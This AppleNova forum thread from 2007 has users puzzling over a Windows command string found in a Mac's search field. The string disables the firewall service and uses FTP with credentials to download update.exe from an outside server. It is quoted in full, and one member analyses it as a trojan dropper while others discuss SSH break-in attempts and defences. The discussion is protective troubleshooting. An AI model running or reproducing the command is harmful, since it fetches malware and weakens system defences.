User Name
Password
AppleNova Forums » Genius Bar »

What in the hell is this? (Weird commands)


Register Members List Calendar Search FAQ Posting Guidelines
What in the hell is this? (Weird commands)
Thread Tools
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-12, 22:01

Quote:
cmd /c net stop sharedaccess 7echo open ftp.holmenhast.se 21 .. ij 7echo user ftp.holmenhast.se f1634163f .. ij 7echo binary .. ij 7echo get update.exe .. ij 7echo bye .. ij 7ftp -n -v -s;ij 7del ij net start sharedacc
What is this? It was in one of the text fields on my Mac mini. It looks like someone was trying to do a remote exploit or something but I have no idea how that would have happened since I'm behind a router. Thoughts?

edit: I just checked my "attached devices" in my router and only my computers are connected.

If it's not red and showing substantial musculature, you're wearing it wrong.
  quote
Majost
monkey with a tiny cymbal
 
Join Date: Nov 2004
Location: Lost
 
2007-04-12, 22:18

Text fields where? In a browser? Or another app?

If it's a remote exploit attempt, it's going after windows: "update.exe"... and it looks like a buffer overflow attempt. But I don't know.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-12, 22:28

Quote:
Originally Posted by Majost View Post
Text fields where? In a browser? Or another app?

If it's a remote exploit attempt, it's going after windows: "update.exe"... and it looks like a buffer overflow attempt. But I don't know.
It was in the text field of System Preferences. It happened to be the frontmost app at the time.

I decided to see what that ftp server was and this was the homepage. Odd.

If it's not red and showing substantial musculature, you're wearing it wrong.

Last edited by torifile : 2007-04-12 at 22:28. Reason: Posts merged
  quote
Banana
is the next Chiquita
 
Join Date: Feb 2005
 
2007-04-12, 22:30

If this was an exploit attempt (not that I would know), I would imagine they'd want to hide their IP somehow, so wouldn't suspect that homepage...
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-12, 22:35

Quote:
Originally Posted by Banana View Post
If this was an exploit attempt (not that I would know), I would imagine they'd want to hide their IP somehow, so wouldn't suspect that homepage...
I'm thinking that it wasn't a remote exploit but that some hackers got hold of an open FTP server and are using it to pass around a file they've called update.exe. I've heard of this type of use of open FTP servers but I have no idea why a 1337 h4x0r would enter that on my box.

If it's not red and showing substantial musculature, you're wearing it wrong.
  quote
Schnauzer
Veteran Member
 
Join Date: Feb 2006
Location: Arizona
 
2007-04-12, 22:41

Quote:
Originally Posted by torifile View Post
I'm thinking that it wasn't a remote exploit but that some hackers got hold of an open FTP server and are using it to pass around a file they've called update.exe. I've heard of this type of use of open FTP servers but I have no idea why a 1337 h4x0r would enter that on my box.
Yeah thats pretty trippy, I sent a link of this topic to one of my 1337 mac friends, that knows all about this kind of stuff....
Seems likes some kind of windows hack, covered up to look like an updater.... Still strange they got in your mac

If you can read this this, please send to an admin, i am blocked and cant post....
  quote
chucker
 
Join Date: May 2004
Location: near Bremen, Germany
Send a message via ICQ to chucker Send a message via AIM to chucker Send a message via MSN to chucker Send a message via Yahoo to chucker Send a message via Skype™ to chucker 
2007-04-12, 23:49

Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 02:47

Quote:
Originally Posted by chucker View Post
Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
Nice. So how the heck did it get on my network and how did it send System Preferences this text?

And, more importantly, how can I protect myself from this happening again? Shit. I just remembered that I've got a Windows computer on the network. It's really just a print server (an old HP laserjet that just won't die). I bet it's compromised. Luckily there's nothing on it but Win2k and some music...

Ok. That Windows box is officially off the network.

If it's not red and showing substantial musculature, you're wearing it wrong.
  quote
AWR
Veteran Member
 
Join Date: Jun 2005
Location: State of Flux
 
2007-04-13, 03:44

Quote:
Originally Posted by chucker View Post
Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
Nice work, Kojack. Here's a lollipop.
  quote
chucker
 
Join Date: May 2004
Location: near Bremen, Germany
Send a message via ICQ to chucker Send a message via AIM to chucker Send a message via MSN to chucker Send a message via Yahoo to chucker Send a message via Skype™ to chucker 
2007-04-13, 04:04

Is your Mac mini the machine doing the Internet connection sharing?
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 04:14

Quote:
Originally Posted by chucker View Post
Is your Mac mini the machine doing the Internet connection sharing?
Nope. I've got a netgear router with a few ports open, but I don't think any of them were mapped to the mini's IP.
  quote
chucker
 
Join Date: May 2004
Location: near Bremen, Germany
Send a message via ICQ to chucker Send a message via AIM to chucker Send a message via MSN to chucker Send a message via Yahoo to chucker Send a message via Skype™ to chucker 
2007-04-13, 04:22

What log file was this text in?
  quote
digitalprimate
Senior Member
 
Join Date: Jan 2006
Location: Antwerp, Belgium
 
2007-04-13, 04:46

Nerdy as this may seem, I find reading this terribly exciting.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 10:50

Quote:
Originally Posted by chucker View Post
What log file was this text in?
It was actually in the text field in the System Preferences. I think that's why that last command looks cut off.

I'll check to log files to see if there's any more info.

Quote:
Originally Posted by digitalprimate View Post
Nerdy as this may seem, I find reading this terribly exciting.
Glad I could provide some nerd excitement.

If it's not red and showing substantial musculature, you're wearing it wrong.

Last edited by torifile : 2007-04-13 at 10:50. Reason: Posts merged
  quote
chucker
 
Join Date: May 2004
Location: near Bremen, Germany
Send a message via ICQ to chucker Send a message via AIM to chucker Send a message via MSN to chucker Send a message via Yahoo to chucker Send a message via Skype™ to chucker 
2007-04-13, 10:53

What text field? Your host name?
  quote
billybobsky
BANNED
I am worthless beyond hope.
 
Join Date: May 2004
Location: Inner Swabia. If you have to ask twice, don't.
 
2007-04-13, 12:02

No... I believe he means the search field...
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 12:09

Quote:
Originally Posted by billybobsky View Post
No... I believe he means the search field...
Yeah. That spotlight field.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 13:34

I have a whole host of sshd failure attempts on my mini. I think that my mini was assigned the IP to which I was forwarding my ssh port. I wonder if someone just happened to guess my password? All I see in security.log are failed login attempts. Is there some place where successful ones are logged? (I've logged in over SSH too, so there should be some success in there but I'm not seeing it.)

edit: my successful logins are in there but they were buried under a billion failures.

If it's not red and showing substantial musculature, you're wearing it wrong.
  quote
Majost
monkey with a tiny cymbal
 
Join Date: Nov 2004
Location: Lost
 
2007-04-13, 14:31

Is your username/password guessable? If so, I really wouldn't be surprised if some dictionary attack succeeded. There are a gazillion SSH dictionary attacks going on all the time.

When I had a machine open to the world with SSH, I got really tired of all the denied entries in my SSH log. So, I just changed which port was forwarded from my router. Instead of linking the router's external port 22 to the Mini's port 22, I linked some random external port, like 23422. While I must stress that this does *not* increase your security, it does reduce the number of dictionary scripts that hit your machine.

You can do much more complicated things that actually do increase your security level, but I would start with a stronger password and moving SSH off of port 22.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 15:04

I'm not too terribly worried about someone getting access to my mini since it only houses music and movies. It is quite annoying though. I'll try using a different port for ssh. And I've changed my passwords just in case. 'course, I've already forgotten the new password. D'oh!

If it's not red and showing substantial musculature, you're wearing it wrong.
  quote
Brad
Selfish Heathen
 
Join Date: May 2004
Location: Zone of Pain
 
2007-04-13, 17:17

Is it at all possible that you could have accidentally pasted that text into the System Preferences search field? That seems to me the simplest and most reasonable explanation to me.

If that were the case, the text could have easily gotten to your clipboard using JavaScript on a malicious web page.

The quality of this board depends on the quality of the posts. The only way to guarantee thoughtful, informative discussion is to write thoughtful, informative posts. AppleNova is not a real-time chat forum. You have time to compose messages and edit them before and after posting.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-13, 17:28

Quote:
Originally Posted by Brad View Post
Is it at all possible that you could have accidentally pasted that text into the System Preferences search field? That seems to me the simplest and most reasonable explanation to me.

If that were the case, the text could have easily gotten to your clipboard using JavaScript on a malicious web page.
I don't think so. While I knew that it was a Windows command line command, I have never seen anything like it before. And I very rarely use the mini to surf (usually just quickly here and gmail) so I don't think that could have happened.

I tried connecting to that ftp server just to see and there's definitely one there but the password - I presume that f1634163f is the password based on where it is in the command - doesn't work.

If it's not red and showing substantial musculature, you're wearing it wrong.
  quote
Majost
monkey with a tiny cymbal
 
Join Date: Nov 2004
Location: Lost
 
2007-04-14, 09:54

Quote:
Originally Posted by torifile View Post
I tried connecting to that ftp server just to see and there's definitely one there but the password - I presume that f1634163f is the password based on where it is in the command - doesn't work.
I think the fs are delimiters. I'd leave them out, making the password just 1634163. That said, I'm not going to try it.
  quote
torifile
Less than Stellar Member
 
Join Date: May 2004
Location: Durham, NC
Send a message via AIM to torifile  
2007-04-14, 10:10

Quote:
Originally Posted by Majost View Post
I think the fs are delimiters. I'd leave them out, making the password just 1634163. That said, I'm not going to try it.
Tried that too. I hope the admins of that server fixed it if it was being used maliciously.
  quote
Posting Rules Navigation
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Post Reply

Forum Jump
Thread Tools
Similar Threads
Thread Thread Starter Forum Replies Last Post
a weird startup problem...so weird...??? stevegong Genius Bar 19 2007-04-13 11:12
Weird Rare Crashes macuser256 Genius Bar 15 2007-03-02 15:35
Weird iMac display problem rushmere Genius Bar 3 2006-06-16 14:33
Weird Rev A iMac G5 Issue bassplayinMacFiend Genius Bar 3 2005-11-16 09:53
Bus to hell Kickaha AppleOutsider 52 2005-07-31 21:16


« Previous Thread | Next Thread »

All times are GMT -5. The time now is 18:47.


Powered by vBulletin®
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd.
Copyright ©2004 - 2018, AppleNova